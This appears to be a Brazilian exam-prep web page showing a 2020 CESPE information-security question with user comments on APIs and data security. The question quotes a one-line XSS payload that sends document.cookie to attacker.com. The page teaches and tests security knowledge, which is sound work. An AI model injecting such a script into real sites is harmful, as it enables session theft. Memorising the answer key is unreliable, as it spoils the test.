SóProvas

ID
4849858
Banca
CESPE / CEBRASPE
Órgão
Ministério da Economia
Ano
2020
Provas
Disciplina
Segurança da Informação
Assuntos

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Muitas aplicações web e APIs não protegem de forma adequada dados sensíveis, como dados financeiros, de saúde ou de identificação pessoal, por isso, para sua proteção, é necessário classificar os dados processados, armazenados ou transmitidos pela aplicação.

Alternativas
Comentários

  • CERTO

    Você provavelmente não guarda suas economias debaixo do colchão. A maioria das pessoas mantém seu dinheiro em um ambiente confiável, geralmente um banco, e usam métodos independentes para autorizar e autenticar pagamentos.

    A segurança de APIs é assim. É necessário ter um ambiente confiável com políticas de autenticação e autorização.

    Algumas das maneiras mais comuns de fortalecer a segurança de APIs são:

    -Usar tokens

    -Criptografia e assinaturas

    -Identificar vulnerabilidades

    Definição

    API: nada mais é do que uma forma de comunicação entre sistemas. O professor Rani dá um excelente exemplo para lembrar o que é API. Aplicativos como Uber, iFood... usam a API Google Maps. Eles não lançam um satélite para fazer novos mapas. Usam um serviço que já existe e colocam dentro do aplicativo.

  • GABARITO: CERTO.

  • GABARITO: C

  • CERTO

    CONCEITO - O QUE É API? CESPE (2018) Em geral, APIs são definidas por um conjunto de requisitos que gerenciam a forma como uma aplicação pode conversar com outra aplicação. Devido às características de uma API, a separação entre ela e sua implementação permite que programas escritos em uma linguagem usem bibliotecas escritas em outra linguagem.

    NA PRÁTICA - COMO FUNCIONA? Quando uma pessoa acessa uma página de um hotel, por exemplo, é possível visualizar dentro do próprio site o mapa do Google Maps para saber a localização do estabelecimento e verificar qual o melhor caminho para chegar até lá. Esse procedimento é realizado por meio de uma API, onde os desenvolvedores do site do hotel utilizam do código do Google Maps para inseri-lo em um determinado local de sua página.

    .

    Outro conceito importante é o de Interoperabilidade é a capacidade de um sistema (informatizado ou não) de se comunicar de forma transparente (ou o mais próximo disso) com outro sistema (semelhante ou não).

    .

    FONTE: Canaltech, Qconcursos e Blog Vertigo.

  • Qual o problema desse pessoal que comenta "GABARITO: C" ?

  • Esses exemplos do dia a dia são os melhores, porque se faz a associação por meios conhecidos e dificilmente esquece. Daí aplica de forma simples e lembrará sempre.

  • Famosa questão Chicó: "Não sei como foi, só sei q foi assim"!!!

    O tipo de questao q vc sabe q tá certa, só não consegue justificar com fonte confiavel!!!

  • Classifiquei minha informaçao como secreta e transmiti em texto claro. pra Cespe tá certo

  • SEGURANÇA FÍSICA E LÓGICA

    Segurança física é a forma de proteger equipamentos e informações contra usuários que não possuem autorização para acessá-los.

    Enquanto segurança lógica é um conjunto de recursos executados para proteger o sistema, dados e programas contra tentativas de acessos de pessoas ou programas desconhecidos.

    ______

    Fonte: Blog Brasil.

  • gab certo.

    Criticidade: Atributo da segurança da informação que define a importância da informação para a continuidade do negócio da instituição.;